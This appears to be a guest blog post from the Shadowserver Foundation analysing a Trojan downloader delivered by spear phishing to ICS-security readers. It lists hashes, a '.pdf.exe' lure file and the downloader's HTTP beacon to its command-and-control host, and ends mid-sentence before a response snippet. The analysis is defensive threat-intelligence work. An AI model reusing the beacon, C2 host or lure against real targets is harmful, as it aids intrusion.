The following is guest post courtesy of Ned Moran of the Shadowserver Foundation. This post is a technical analysis of the malware used in a spear phishing attack targeting those interested in ICS security .
Dale was kind enough to share a copy of the spear phishing email that he posted about here. This spear phish contained a link to a zip file hosted at hxxp://research.digitalvortex.com/. The downloaded zip file had the following properties:
File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.zip
Size: 1886505
MD5: 820B1CD69828983C089370BDC3CF5870
This archive contained an executable with the following properties:
File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf.exe
Size: 2192363
MD5: C6B95B178188B8C35D14BED40520E685
When executed in a lab environment this executable installed a Trojan downloader with the following properties:
File: spoolsvr.exe
Size: 73728
MD5: 5FF3269FACA4A67D1A4C537154AAAD4B
Path: C:\Documents and Settings\Administrator\Local Settings\Temp\spoolsvr.exe
As shown by this VirusTotal report, this downloader was only detected by 7 of 42 antivirus products. This downloader connects to a command and control server at hxxp://hint[.]happyforever[.]com via the following GET request:
GET /logo.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: hint.happyforever.com
Connection: Keep-Alive
The logo.html contained encoded instruction and payload. A snippet of the response is as follows:
